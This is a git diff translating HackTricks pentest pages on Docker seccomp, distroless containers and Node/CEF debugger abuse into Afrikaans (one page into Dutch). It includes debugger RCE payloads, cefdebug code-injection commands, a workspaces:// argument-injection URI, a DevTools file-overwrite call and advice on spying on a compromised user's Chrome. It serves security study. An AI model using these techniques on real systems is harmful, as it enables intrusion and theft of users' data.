+hello-world ``` - -If you want for example to **forbid** a container of executing some **syscall** like `uname` you could download the default profile from [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) and just **remove the `uname` string from the list**.\ -If you want to make sure that **some binary doesn't work inside a a docker container** you could use strace to list the syscalls the binary is using and then forbid them.\ -In the following example the **syscalls** of `uname` are discovered: - +As jy byvoorbeeld 'n houer wil **verbied** om sekere **syscall** soos `uname` uit te voer, kan jy die verstek profiel aflaai vanaf [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) en net die `uname` string uit die lys **verwyder**.\ +As jy seker wil maak dat **'n sekere binêre lêer nie binne 'n Docker-houer werk nie**, kan jy strace gebruik om die syscalls wat die binêre lêer gebruik, te lys en dit dan verbied.\ +In die volgende voorbeeld word die **syscalls** van `uname` ontdek: ```bash docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname ``` - {% hint style="info" %} -If you are using **Docker just to launch an application**, you can **profile** it with **`strace`** and **just allow the syscalls** it needs +As jy **Docker net gebruik om 'n toepassing te begin**, kan jy dit **profiler** met **`strace`** en slegs die syscalls toelaat wat dit nodig het. {% endhint %} -### Example Seccomp policy +### Voorbeeld Seccomp-beleid -[Example from here](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) - -To illustrate Seccomp feature, let’s create a Seccomp profile disabling “chmod” system call as below. +[Voorbeeld van hier](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) +Om die Seccomp-funksie te illustreer, skep ons 'n Seccomp-profiel wat die "chmod" stelseloproep deaktiveer soos hieronder. ```json { - "defaultAction": "SCMP_ACT_ALLOW", - "syscalls": [ - { - "name": "chmod", - "action": "SCMP_ACT_ERRNO" - } - ] +"defaultAction": "SCMP_ACT_ALLOW", +"syscalls": [ +{ +"name": "chmod", +"action": "SCMP_ACT_ERRNO" +} +] } ``` - -In the above profile, we have set default action to “allow” and created a black list to disable “chmod”. To be more secure, we can set default action to drop and create a white list to selectively enable system calls.\ -Following output shows the “chmod” call returning error because its disabled in the seccomp profile - +In die bogenoemde profiel het ons die verstekaksie op "toelaat" gestel en 'n swartlys geskep om "chmod" te deaktiveer. Om meer veilig te wees, kan ons die verstekaksie op "afwerp" stel en 'n witlys skep om selektief stelseloproepe toe te laat.\ +Die volgende uitset toon die "chmod" oproep wat 'n fout teruggee omdat dit gedeaktiveer is in die seccomp-profiel. ```bash $ docker run --rm -it --security-opt seccomp:/home/smakam14/seccomp/profile.json busybox chmod 400 /etc/hosts chmod: /etc/hosts: Operation not permitted ``` - -Following output shows the “docker inspect” displaying the profile: - +Die volgende uitset toon die "docker inspect" wat die profiel vertoon: ```json - "SecurityOpt": [ - "seccomp:{\"defaultAction\":\"SCMP_ACT_ALLOW\",\"syscalls\":[{\"name\":\"chmod\",\"action\":\"SCMP_ACT_ERRNO\"}]}" - ], +"SecurityOpt": [ +"seccomp:{\"defaultAction\":\"SCMP_ACT_ALLOW\",\"syscalls\":[{\"name\":\"chmod\",\"action\":\"SCMP_ACT_ERRNO\"}]}" +], ``` +### Deaktiveer dit in Docker -### Deactivate it in Docker +Begin 'n houer met die vlag: **`--security-opt seccomp=unconfined`** -Launch a container with the flag: **`--security-opt seccomp=unconfined`** - -As of Kubernetes 1.19, **seccomp is enabled by default for all Pods**. However, the default seccomp profile applied to the Pods is the "**RuntimeDefault**" profile, which is **provided by the container runtime** (e.g., Docker, containerd). The "RuntimeDefault" profile allows most system calls while blocking a few that are considered dangerous or not generally required by containers. +Vanaf Kubernetes 1.19, is **seccomp standaard geaktiveer vir alle Pods**. Die verstek seccomp profiel wat op die Pods toegepas word, is die "**RuntimeDefault**" profiel, wat **voorsien word deur die houer runtime** (bv. Docker, containerd). Die "RuntimeDefault" profiel laat die meeste stelseloproepe toe terwyl dit 'n paar blokkeer wat as gevaarlik beskou word of nie algemeen deur houers benodig word nie.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md index 522f9a413..9cb0ec5ee 100644 --- a/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md +++ b/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md @@ -1,56 +1,56 @@ -# Weaponizing Distroless +# Bewapening van Distroless
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## What is Distroless +## Wat is Distroless -A distroless container is a type of container that **contains only the necessary dependencies to run a specific application**, without any additional software or tools that are not required. These containers are designed to be as **lightweight** and **secure** as possible, and they aim to **minimize the attack surface** by removing any unnecessary components. +Een distroless-container is een type container dat **alleen de noodzakelijke afhankelijkheden bevat om een specifieke toepassing uit te voeren**, zonder extra software of tools die niet nodig zijn. Deze containers zijn ontworpen om zo **lichtgewicht** en **veilig** mogelijk te zijn en ze streven ernaar om **het aanvalsoppervlak te minimaliseren** door onnodige componenten te verwijderen. -Distroless containers are often used in **production environments where security and reliability are paramount**. +Distroless-containers worden vaak gebruikt in **productieomgevingen waar beveiliging en betrouwbaarheid van groot belang zijn**. -Some **examples** of **distroless containers** are: +Enkele **voorbeelden** van **distroless-containers** zijn: -* Provided by **Google**: [https://console.cloud.google.com/gcr/images/distroless/GLOBAL](https://console.cloud.google.com/gcr/images/distroless/GLOBAL) -* Provided by **Chainguard**: [https://github.com/chainguard-images/images/tree/main/images](https://github.com/chainguard-images/images/tree/main/images) +* Aangeboden door **Google**: [https://console.cloud.google.com/gcr/images/distroless/GLOBAL](https://console.cloud.google.com/gcr/images/distroless/GLOBAL) +* Aangeboden door **Chainguard**: [https://github.com/chainguard-images/images/tree/main/images](https://github.com/chainguard-images/images/tree/main/images) -## Weaponizing Distroless +## Bewapening van Distroless -The goal of weaponize a distroless container is to be able to **execute arbitrary binaries and payloads even with the limitations** implied by **distroless** (lack of common binaries in the system) and also protections commonly found in containers such as **read-only** or **no-execute** in `/dev/shm`. +Het doel van het bewapenen van een distroless-container is om in staat te zijn **willekeurige binaries en payloads uit te voeren, zelfs met de beperkingen** die worden opgelegd door **distroless** (gebrek aan gangbare binaries in het systeem) en ook beveiligingsmaatregelen die vaak worden aangetroffen in containers, zoals **alleen-lezen** of **niet-uitvoeren** in `/dev/shm`. -### Through memory +### Via het geheugen -Coming at some point of 2023... +Komt op een gegeven moment in 2023... -### Via Existing binaries +### Via bestaande binaries #### openssl -****[**In this post,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed** by the software that is going to be running inside the container. +****[**In deze post**](https://www.form3.tech/engineering/content/exploiting-distroless-images) wordt uitgelegd dat de binary **`openssl`** vaak wordt aangetroffen in deze containers, mogelijk omdat deze **nodig** is voor de software die binnen de container wordt uitgevoerd. -Abusing the **`openssl`** binary is possible to **execute arbitrary stuff**. +Door misbruik te maken van de **`openssl`** binary is het mogelijk om **willekeurige dingen uit te voeren**.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md index ab1e5c854..9ffd7107e 100644 --- a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md +++ b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md @@ -1,31 +1,30 @@ -# Node inspector/CEF debug abuse +# Node inspector/CEF debug misbruik
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -[From the docs](https://origin.nodejs.org/ru/docs/guides/debugging-getting-started): When started with the `--inspect` switch, a Node.js process listens for a debugging client. By **default**, it will listen at host and port **`127.0.0.1:9229`**. Each process is also assigned a **unique** **UUID**. +[Van die dokumentasie](https://origin.nodejs.org/ru/docs/guides/debugging-getting-started): Wanneer dit begin word met die `--inspect` skakelaar, luister 'n Node.js-proses vir 'n foutopsporingskliënt. Standaard sal dit luister by die gasheer en poort **`127.0.0.1:9229`**. Elke proses word ook toegewys 'n **unieke** **UUID**. -Inspector clients must know and specify host address, port, and UUID to connect. A full URL will look something like `ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`. +Opsoekerskliënte moet die gasheeradres, poort en UUID ken en spesifiseer om te kan koppel. 'n Volledige URL sal iets lyk soos `ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`. {% hint style="warning" %} -Since the **debugger has full access to the Node.js execution environment**, a malicious actor able to connect to this port may be able to execute arbitrary code on behalf of the Node.js process (**potential privilege escalation**). +Aangesien die **foutopsporingsprogram volle toegang tot die Node.js-uitvoeringsomgewing het**, kan 'n kwaadwillige persoon wat in staat is om met hierdie poort te verbind, moontlik arbitrêre kode uitvoer namens die Node.js-proses (**potensiële bevoorregte eskalasie**). {% endhint %} -There are several ways to start an inspector: - +Daar is verskeie maniere om 'n opsoeker te begin: ```bash node --inspect app.js #Will run the inspector in port 9229 node --inspect=4444 app.js #Will run the inspector in port 4444 @@ -36,60 +35,50 @@ node --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and po node --inspect --inspect-port=0 app.js #Will run the inspector in a random port # Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector ``` - -When you start an inspected process something like this will appear: - +Wanneer jy 'n geïnspekteerde proses begin, sal iets soos hierdie verskyn: ``` Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d For help, see: https://nodejs.org/en/docs/inspector ``` +Prosesse gebaseer op **CEF** (**Chromium Embedded Framework**) soos moet die parameter gebruik: `--remote-debugging-port=9222` om die **debugger** oop te maak (die SSRF-beskerming bly baie soortgelyk). In plaas daarvan om 'n **NodeJS** **debug**-sessie toe te staan, sal hulle kommunikeer met die blaaier deur die [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/), dit is 'n koppelvlak om die blaaier te beheer, maar daar is nie 'n direkte RCE nie. -Processes based on **CEF** (**Chromium Embedded Framework**) like need to use the param: `--remote-debugging-port=9222` to open de **debugger** (the SSRF protections remain very similar). However, they **instead** of granting a **NodeJS** **debug** session will communicate with the browser using the [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/), this is an interface to control the browser, but there isn't a direct RCE. - -When you start a debugged browser something like this will appear: - +Wanneer jy 'n gedebugde blaaier begin, sal iets soos hierdie verskyn: ``` DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369 ``` +### Webblaaier, WebSockets en selfde-oorsprongbeleid -### Browsers, WebSockets and same-origin policy - -Websites open in a web-browser can make WebSocket and HTTP requests under the browser security model. An **initial HTTP connection** is necessary to **obtain a unique debugger session id**. The **same-origin-policy** **prevents** websites from being able to make **this HTTP connection**. For additional security against [**DNS rebinding attacks**](https://en.wikipedia.org/wiki/DNS\_rebinding)**,** Node.js verifies that the **'Host' headers** for the connection either specify an **IP address** or **`localhost`** or **`localhost6`** precisely. +Webwerwe wat in 'n webblaaier oopgemaak word, kan WebSocket- en HTTP-versoeke maak onder die webblaaier se veiligheidsmodel. 'n **Aanvanklike HTTP-verbinding** is nodig om 'n unieke aflyn-sessie-ID te verkry. Die **selfde-oorsprongbeleid** **voorkom** dat webwerwe in staat is om **hierdie HTTP-verbinding** te maak. Vir addisionele veiligheid teen [**DNS-herbindingsaanvalle**](https://en.wikipedia.org/wiki/DNS\_rebinding)**,** verifieer Node.js dat die **'Host'-koppe** vir die verbinding 'n **IP-adres** of **`localhost`** of **`localhost6`** spesifiek aandui. {% hint style="info" %} -This **security measures prevents exploiting the inspector** to run code by **just sending a HTTP request** (which could be done exploiting a SSRF vuln). +Hierdie **veiligheidsmaatreëls voorkom die uitbuiting van die inspekteur** om kode uit te voer deur **net 'n HTTP-versoek te stuur** (wat gedoen kon word deur 'n SSRF-fout uit te buit). {% endhint %} -### Starting inspector in running processes - -You can send the **signal SIGUSR1** to a running nodejs process to make it **start the inspector** in the default port. However, note that you need to have enough privileges, so this might grant you **privileged access to information inside the process** but no a direct privilege escalation. +### Inspekteur begin in lopende prosesse +Jy kan die **sein SIGUSR1** na 'n lopende Node.js-proses stuur om dit **die inspekteur te begin** op die verstekpoort. Let egter daarop dat jy genoeg voorregte moet hê, sodat dit jou moontlik **bevoorregte toegang tot inligting binne die proses** kan gee, maar nie 'n direkte bevoorregte verhoging nie. ```bash kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d ``` - {% hint style="info" %} -This is useful in containers because **shutting down the process and starting a new one** with `--inspect` is **not an option** because the **container** will be **killed** with the process. +Dit is nuttig in houers omdat die proses afgeskakel en 'n nuwe een begin met `--inspect` nie 'n opsie is nie omdat die houer met die proses doodgemaak sal word. {% endhint %} -### Connect to inspector/debugger +### Koppel aan inspekteur/debugeerder -To connect to a **Chromium-based browser**, the `chrome://inspect` or `edge://inspect` URLs can be accessed for Chrome or Edge, respectively. By clicking the Configure button, it should be ensured that the **target host and port** are correctly listed. The image shows a Remote Code Execution (RCE) example: +Om aan te sluit by 'n Chromium-gebaseerde webblaaier, kan die `chrome://inspect` of `edge://inspect` URL's gebruik word vir Chrome of Edge onderskeidelik. Deur op die Configureer-knoppie te klik, moet verseker word dat die teiken gasheer en poort korrek gelys is. Die prent wys 'n voorbeeld van 'n Remote Code Execution (RCE): ![](<../../.gitbook/assets/image (620) (1).png>) -Using the **command line** you can connect to a debugger/inspector with: - +Met die **opdraglyn** kan jy koppel aan 'n debugeerder/inspekteur met: ```bash node inspect : node inspect 127.0.0.1:9229 # RCE example from debug console debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')") ``` - -The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug), allows to **find inspectors** running locally and **inject code** into them. - +Die instrument [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug), maak dit moontlik om **inspekteerders** wat plaaslik loop te **vind** en **kode in te spuit** in hulle. ```bash #List possible vulnerable sockets ./cefdebug.exe @@ -98,76 +87,67 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd #Exploit it ./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')" ``` - {% hint style="info" %} -Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) (you need to check the API to find interesting things to do with it). +Let daarop dat **NodeJS RCE-aanvalle nie sal werk** as jy verbind is met 'n webblaaier via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) (jy moet die API nagaan om interessante dinge daarmee te doen). {% endhint %} ## RCE in NodeJS Debugger/Inspector {% hint style="info" %} -If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/) +As jy hier gekom het om uit te vind hoe om [**RCE te kry vanaf 'n XSS in Electron, kyk asseblief hierdie bladsy.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/) {% endhint %} -Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**): - +Sommige algemene maniere om **RCE** te verkry wanneer jy kan **verbind** met 'n Node **inspekteur** is om iets soos die volgende te gebruik (lyk dit sal nie werk in 'n verbinding met die Chrome DevTools-protokol nie): ```javascript process.mainModule.require('child_process').exec('calc') window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe") require('child_process').spawnSync('calc.exe') Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"})) ``` +## Chrome DevTools-protokol-pakette -## Chrome DevTools Protocol Payloads +Jy kan die API hier nagaan: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\ +In hierdie gedeelte sal ek net interessante dinge lys wat mense gebruik het om hierdie protokol uit te buit. -You can check the API here: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\ -In this section I will just list interesting things I find people have used to exploit this protocol. +### Parameterinspuiting via diep skakels -### Parameter Injection via Deep Links +In die [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) het Rhino Security ontdek dat 'n toepassing gebaseer op CEF 'n aangepaste URI in die stelsel geregistreer het (workspaces://) wat die volledige URI ontvang en dan die CEF-gebaseerde toepassing met 'n konfigurasie wat gedeeltelik uit daardie URI saamgestel is, **geaktiveer** het. -In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI. - -It was discovered that the URI parameters where URL decoded and used to launch the CEF basic application, allowing a user to **inject** the flag **`--gpu-launcher`** in the **command line** and execute arbitrary things. - -So, a payload like: +Daar is ontdek dat die URI-parameters URL-dekodeer is en gebruik is om die CEF-basis-toepassing te aktiveer, wat 'n gebruiker in staat stel om die vlag **`--gpu-launcher`** in die **opdraglyn** in te spuit en arbitrêre dinge uit te voer. +So, 'n payload soos: ``` workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE ``` +Sal voer 'n calc.exe uit. -Will execute a calc.exe. - -### Overwrite Files - -Change the folder where **downloaded files are going to be saved** and download a file to **overwrite** frequently used **source code** of the application with your **malicious code**. +### Oorskryf Lêers +Verander die vouer waar **afgelaaide lêers gestoor gaan word** en laai 'n lêer af om die gereeld gebruikte **bronkode** van die toepassing met jou **skadelike kode** te **oorskryf**. ```javascript ws = new WebSocket(url); //URL of the chrome devtools service ws.send(JSON.stringify({ - id: 42069, - method: 'Browser.setDownloadBehavior', - params: { - behavior: 'allow', - downloadPath: '/code/' - } +id: 42069, +method: 'Browser.setDownloadBehavior', +params: { +behavior: 'allow', +downloadPath: '/code/' +} })); ``` +### Webdriver RCE en eksfiltrering -### Webdriver RCE and exfiltration - -According to this post: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) it's possible to obtain RCE and exfiltrate internal pages from theriver. +Volgens hierdie pos: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) is dit moontlik om RCE te verkry en interne bladsye uit te eksfiltreer vanaf theriver. ### Post-Exploitation -In a real environment and **after compromising** a user PC that uses Chrome/Chromium based browser you could launch a Chrome process with the **debugging activated and port-forward the debugging port** so you can access it. This way you will be able to **inspect everything the victim does with Chrome and steal sensitive information**. - -The stealth way is to **terminate every Chrome process** and then call something like +In 'n werklike omgewing en **nadat 'n gebruiker se rekenaar wat Chrome/Chromium-gebaseerde blaaier gebruik, gekompromitteer is**, kan jy 'n Chrome-proses begin met die **aktivering van foutopsporing en die deurstuur van die foutopsporingspoort**, sodat jy daarby kan kom. Op hierdie manier sal jy in staat wees om **alles wat die slagoffer met Chrome doen te ondersoek en sensitiewe inligting te steel**. +Die sluipende manier is om **elke Chrome-proses te beëindig** en dan iets soos te roep ```bash Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session" ``` - -## References +## Verwysings * [https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s) * [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug) @@ -182,14 +162,14 @@ Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index f09a01b29..5d2d17db2 100644 --- a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md +++ b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md @@ -1,46 +1,45 @@ -# Escaping from Jails +# Ontsnapping uit Gevangenisse
